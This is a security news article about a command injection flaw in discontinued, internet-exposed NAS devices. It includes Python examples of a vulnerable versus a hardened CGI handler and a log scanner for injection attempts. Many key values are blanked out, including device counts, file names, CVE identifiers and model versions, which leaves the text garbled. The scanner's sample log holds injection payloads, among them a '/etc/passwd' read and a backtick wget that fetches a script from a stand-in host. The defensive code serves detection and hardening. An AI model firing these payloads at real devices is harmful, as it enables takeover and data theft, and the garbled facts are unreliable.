Device - Vulnerable to Command Injection Attacks
A newly discovered command injection vulnerability has been identified in the device, affecting approximately , devices globally.
The flaw lets an unauthenticated, remote attacker execute arbitrary commands by abusing specific parameters of a script on the device, with the attendant risk of data theft and ransomware.
The vulnerability exists in ., where the parameter in the command is passed to the system without validation, allowing remote attackers to bypass authentication and inject commands of their own.
Researchers found the flaw through technical analysis of how the parameter is handled: its value is used without sufficient input sanitization.
By crafting malicious requests, an attacker can place shell metacharacters in this parameter and have the device run arbitrary commands.
For example, a sample command shows how an attacker can gain system-level access by replacing - with the target's address and injecting the command directly into the request; the device then executes it as the system user running the script.
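To make the bug class concrete, the following is an added example written for this article, not the affected device's code: a CGI-style handler that interpolates a request parameter into a shell command (the flaw described above) next to a hardened version that allow-lists the value and passes it as a discrete argv element so no shell ever parses it. The parameter name `target`, the `echo` command and the query strings are assumptions made for illustration.

```python
import re
import subprocess
from typing import List, Optional
from urllib.parse import parse_qs

# The parameter name and the command shape are assumptions for this example;
# they are not taken from the affected device's script.
PARAM = "target"
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,64}")  # allow-list: hostname-like values only


def vulnerable_command(query_string: str) -> str:
    """Build the command line the way the flawed pattern does: the request
    parameter is interpolated verbatim into a string that will be handed to
    system()/sh -c, so any ';', '|', '`' or '$(' in it becomes shell syntax."""
    params = parse_qs(query_string, keep_blank_values=True)
    value = params.get(PARAM, [""])[0]
    return f"echo checking {value}"  # unsanitised interpolation


def hardened_argv(query_string: str) -> Optional[List[str]]:
    """Hardened equivalent: reject anything outside the allow-list and pass
    the value as its own argv element. Returns None when the value is rejected."""
    params = parse_qs(query_string, keep_blank_values=True)
    value = params.get(PARAM, [""])[0]
    if not SAFE_VALUE.fullmatch(value):
        return None
    return ["echo", "checking", value]


def run_vulnerable(query_string: str) -> str:
    # shell=True: /bin/sh parses the whole string, so ';' starts a second command.
    return subprocess.run(vulnerable_command(query_string), shell=True,
                          capture_output=True, text=True).stdout


def run_hardened(query_string: str) -> Optional[str]:
    argv = hardened_argv(query_string)
    if argv is None:
        return None
    # No shell involved: argv[2] stays one argument even if it contained ';'.
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    benign = "target=nas-01.local"
    # Constructed attack string: URL-encoded ';echo INJECTED' appended to the value.
    attack = "target=127.0.0.1%3Becho%20INJECTED"
    print("vulnerable command line:", vulnerable_command(attack))
    print("vulnerable output:\n" + run_vulnerable(attack))   # second line shows the injected command ran
    print("hardened argv:", hardened_argv(attack))            # None: request rejected
    print("hardened output:", run_hardened(benign))
```

The fix is structural rather than cosmetic: escaping with `shlex.quote` would neutralise this particular payload, but the allow-list plus an argv call removes the shell from the path entirely, which is the only way to be sure no encoding trick reaches an interpreter.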
Affected devices
The vulnerability is identified as --, affecting several models of -.
- The product line has been discontinued, so these devices no longer receive support or security patches. The affected models include:
-(Version .)
- (Version ...)
(Version . and .)
-(Version .)
These models are commonly used in homes and small businesses to centralize data storage and share files over the network. Because many of them are reachable directly from the internet, they are attractive targets for remote attacks.
Internet scan results indicate that over , devices are exposed online.
For a capable attacker, exploiting this vulnerability is trivial: a single carefully crafted request is enough to deliver the command injection payload.
Once these devices are reachable from the internet, threat actors can exploit the flaw to gain unauthorized access, execute arbitrary commands, and potentially take over the entire system.
This puts all data stored on the device at risk, since an attacker with command execution can deploy ransomware, steal sensitive information, or simply delete the stored files.
- Risk
Previously, another severe command injection vulnerability (--) was reported in the devices, affecting over , devices.
That flaw was likewise a command injection issue in devices that had been discontinued and were no longer supported by the manufacturer.
Shortly after it was disclosed, reports confirmed that it was being actively exploited in the wild, with attackers sharing lists of vulnerable targets on underground forums to enable broader attacks.
Given the high risk and the end of vendor support, users of the affected models should take defensive measures immediately:
Retire vulnerable devices or replace them with supported secure alternatives.
Isolate the device from the internet-facing network to prevent unauthorized access.
Implement strict firewall rules to restrict access to the device.
Regularly monitor access logs for any unusual activity and issue alerts for any unauthorized attempts.
Consider using third-party firmware as a temporary measure, but be aware that - does not endorse or support it.
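The log-monitoring recommendation above is only useful if you know what to look for. The following is an added example, not part of the advisory or any vendor tooling: it scans web-server access logs in Common Log Format for requests to CGI endpoints whose decoded query string contains shell metacharacters, the signature of the injection attempts described in this article. The log lines, IP addresses and the `/cgi-bin/status.cgi` path are constructed for the example.

```python
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote, urlsplit

# Constructed sample log (Common Log Format). Hosts, IPs and the CGI path are
# invented for this example and do not come from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2024:03:12:44 +0000] "GET /cgi-bin/status.cgi?target=nas-01 HTTP/1.1" 200 512
198.51.100.23 - - [10/Apr/2024:03:13:01 +0000] "GET /cgi-bin/status.cgi?target=127.0.0.1%3Bid HTTP/1.1" 200 731
198.51.100.23 - - [10/Apr/2024:03:13:05 +0000] "GET /cgi-bin/status.cgi?target=x%7Ccat%20%2Fetc%2Fpasswd HTTP/1.1" 200 2210
192.168.1.20 - - [10/Apr/2024:03:14:10 +0000] "GET /index.html HTTP/1.1" 200 1024
198.51.100.23 - - [10/Apr/2024:03:15:30 +0000] "POST /cgi-bin/status.cgi?target=%60wget%20http%3A%2F%2F198.51.100.23%2Fx.sh%60 HTTP/1.1" 500 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters that let a value escape into shell syntax: ; | & ` $ and newline.
SHELL_META = re.compile(r"[;|&`$\n]")
CGI_PREFIX = "/cgi-bin/"


def fully_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double-encoded payloads (%253B) are caught too."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per CGI request whose decoded query holds shell metacharacters."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m.group("url").startswith(CGI_PREFIX):
            continue
        query = fully_decode(urlsplit(m.group("url")).query)
        if SHELL_META.search(query):
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "method": m.group("method"),
                "status": m.group("status"),
                "query": query,
            })
    return findings


def attackers(findings: List[Dict[str, str]]) -> Counter:
    """Count flagged requests per source address, for alerting or blocking."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} {h['method']} status={h['status']} query={h['query']!r}")
    print("per-source counts:", dict(attackers(hits)))
```

A 200 response to a flagged request does not prove success, but combined with the unsupported status of the device it is enough to trigger an alert; an internet-facing source address hitting a CGI endpoint at all should already violate the firewall rules recommended above.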
A security bulletin has been released:
https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10413
/ Model (including affected models)
The bulletin confirms that no security updates will be released and lists additional device models that users should replace.